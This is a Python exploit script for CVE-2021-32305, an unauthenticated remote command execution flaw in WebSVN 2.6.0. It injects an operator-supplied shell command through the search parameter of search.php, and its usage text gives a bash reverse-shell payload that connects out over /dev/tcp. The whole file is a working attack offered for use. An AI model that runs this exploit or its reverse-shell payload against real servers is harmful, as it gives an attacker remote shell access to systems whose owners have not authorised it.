# Exploit Author: FredBrave
# CVE: CVE-2021-32305
# Exploit: Websvn 2.6.0 - RCE (Unauthenticated)


import optparse, requests, sys, urllib, signal


# Functions
def helpPanel():
    print("\n\nExample of the use:\n")
    print('python3 exploit.py --url http://10.0.2.1/websvn/ --payload "bash -c \'bash -i >& /dev/tcp/10.0.2.2/443 0>&1\'"\n\n\n')
    sys.exit(1)

def exiting(sig, frame):
    print("\n\n\nExiting of program...")
    sys.exit(1)

#Ctrl + C
signal.signal(signal.SIGINT, exiting)

def Getarguments():
    parser = optparse.OptionParser()
    parser.add_option('--url', dest='target', help='Url Target')
    parser.add_option('--payload', dest='payload', help='Command to execute')
    (options, arguments) = parser.parse_args()
    if not options.target:
        helpPanel()
        parser.error("[-] Please indicate the url of target --url, for more information... --help")
    if not options.payload:
        helpPanel()
        parser.error("[-] Please indicate the payload --payload, for more information... --help")
    return options

def execute(target, payload):
    requests.get(target + 'search.php?search=";{};"'.format(payload))



def main():
    options = Getarguments()
    target = options.target
    pay = options.payload
    payload = urllib.parse.quote_plus(pay)
    execute(target, payload)


if __name__ == '__main__':
    main()